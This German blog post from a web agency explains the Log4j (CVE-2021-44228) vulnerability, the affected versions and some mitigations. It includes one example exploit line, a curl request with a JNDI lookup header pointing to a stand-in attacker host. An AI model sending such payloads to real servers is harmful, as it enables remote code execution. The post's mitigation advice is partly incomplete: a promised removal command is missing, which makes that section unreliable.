BrandCrock | Tor zur digitalen Marke

Wie verhindert man, dass die Log4j-Schwachstelle ausgenutzt wird?

Die Log4j-Sicherheitslücke betrifft alles, von der Cloud bis hin zu Entwickler-Tools und Sicherheitsgeräten. Nachfolgend erfahren Sie, worauf Sie nach den neuesten Informationen achten sollten.

Was ist Log4j?

Bei der Log4j-Schwachstelle handelt es sich um eine neue kritische Zero-Day-Schwachstelle, die im Open-Source-Apache-Logging-Framework „Log4j“ entdeckt wurde, das zur Aufzeichnung der Aktivitäten innerhalb einer Java-Anwendung verwendet wird. Es handelt sich um eine schwerwiegende Sicherheitslücke, die dadurch ausgelöst wird, dass ein Benutzer eine bösartige Nutzlast als Anfrage an den Server sendet, auf dem eine Java-Anwendung läuft, die das Log4j-Paket zur Aufzeichnung der Aktivitäten verwendet. Dies kann durch das Senden einer normalen Anfrage zusammen mit einer Nutzlast wie der folgenden ausgelöst werden

curl xxxxx -H 'X-Api-Version: ${jndi:ldap://attack.com/attack}

Das obige curl sendet eine Anfrage an den XXXX-Server mit der Nutzlast, die eine Website oder eine beliebige IP-Adresse über die Java Naming Directory-Schnittstelle aufruft. Anstatt den Payload herauszufiltern, ruft das JNDI direkt die Website „attack.com“ über das ldap-Protokoll auf. Dies kann dazu verwendet werden, jeden laufenden Server auszunutzen, da jeder Angreifer direkt Befehle auf dem Server ausführen kann, indem er ein Skript mit diesem Ausnutzungsbefehl herunterlädt.

Mehr dazu finden Sie hier - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Wie können Hacker die Sicherheitslücke in Log4j ausnutzen?

Die Log4j-Schwachstelle, die letzte Woche von Apache bekannt gegeben wurde, ermöglicht es Angreifern, Code aus der Ferne auf einem Zielcomputer auszuführen, was bedeutet, dass sie Daten stehlen, Malware installieren oder die Kontrolle übernehmen können. Einige Cyberkriminelle haben Software installiert, die ein gehacktes System zum Mining von Kryptowährungen nutzt, während andere Malware entwickelt haben, die es Angreifern ermöglicht, Computer für groß angelegte Angriffe auf die Internet-Infrastruktur zu kapern.

Wo wird Log4j eingesetzt?

Die Log4j 2-Bibliothek wird in Java-Unternehmenssoftware verwendet und ist laut der britischen NCSC in Apache-Frameworks wie Apache Struts2, Apache Solr, Apache Druid, Apache Flink und Apache Swift enthalten.

Wie weit wird die Log4j-Schwachstelle ausgenutzt?

Sicherheitsexperten haben davor gewarnt, dass es Hunderttausende von Versuchen von Hackern gibt, verwundbare Geräte zu finden; über 40 Prozent der Unternehmensnetzwerke wurden nach Angaben eines Sicherheitsunternehmens angegriffen.

Welche Versionen der Log4j-Bibliothek sind anfällig?

Fast alle Versionen von Log4j sind verwundbar, angefangen von 2.0-beta9 bis 2.14.1. Die einfachste und effektivste Schutzmethode besteht darin, die neueste Version der Bibliothek, 2.15.0, zu installieren.

Wie kann man seinen Server vor Log4j-Angriffen schützen?

Gemäß dem Grundschutzmodul [BSI2021a] sollte in allen Anwendungen ein Update auf die aktuelle Version 2.15.0 [APA2021] (gittag: 2.15.0-rc2 [GIT2021c]) von log4j sichergestellt werden. Da Updates von Abhängigkeiten in Java-Applikationen oft nicht zeitnah durchgeführt werden können, sollte bis dahin die folgende Abhilfemaßnahme getroffen werden:

Die Option "log4j2.formatMsgNoLookups" sollte von der Java Virtual Machine mit dem Argument "true" gesetzt werden
"-Dlog4j2.formatMsgNoLookups = True" gestartet wird.

Vorsicht ist geboten: Diese Maßnahme kann die Funktionalität der Anwendung beeinträchtigen, wenn die Nachschlagefunktion tatsächlich genutzt wird.

Um frühere Versionen von Log4j (von 2.0-beta9 bis 2.10.0) zu schützen, empfehlen die Entwickler der Bibliothek, die Klasse JndiLookup aus dem Klassenpfad zu entfernen:

Wie verhindert man, dass die Log4j-Schwachstelle ausgenutzt wird?

Obwohl log4j mit einer neueren Version 2.15.0 herausgekommen ist, in der der Exploit ausgeschaltet ist. Der beste Weg, sich zu schützen, ist die Einrichtung von Firewall-Regeln, die verhindern, dass jemand eingehende Anfragen über LDAP-Protokolle an die kritischen Server sendet.

Sie können das neueste Paket unter diesem offiziellen Link herunterladen https://logging.apache.org/log4j/2.x/download.html

More from our latest blogs

Visual comparison of building vs buying software features — a glowing gear in one hand for custom builds, and a polished sphere in the other hand for off-the-shelf solutions.

Build or Buy? Rethinking Custom vs Off-the-Shelf Features in 2025

It’s a question that comes up in nearly every strategy call, stakeholder meeting, or MVP...

E-Commerce Vaid Ali Juli 25, 2025
5-Reasons-Your-API-Heavy-Store-Feels-Slower-Than-Expected.

5 Reasons Your API-Heavy Store Feels Slower Than Expected

We’ve seen it happen more than once. A store gets rebuilt using the latest stack,...

E-Commerce Vaid Ali Juli 18, 2025

The Hidden Cost of Too Many Plugins: How to Audit & Clean Your Stack

Too many plugins can quietly slow down your site, weaken security, and cause unexpected errors....

E-Commerce Vaid Ali Juli 11, 2025

Von kopflos zu hilflos? Behebung häufiger Build-Fehler im Jahr 2025

Not long ago, going headless was the upgrade everyone talked about — faster sites, total...

Uncategorized zubair zubair Juli 3, 2025
1 2 3 4 41
Nach oben scrollen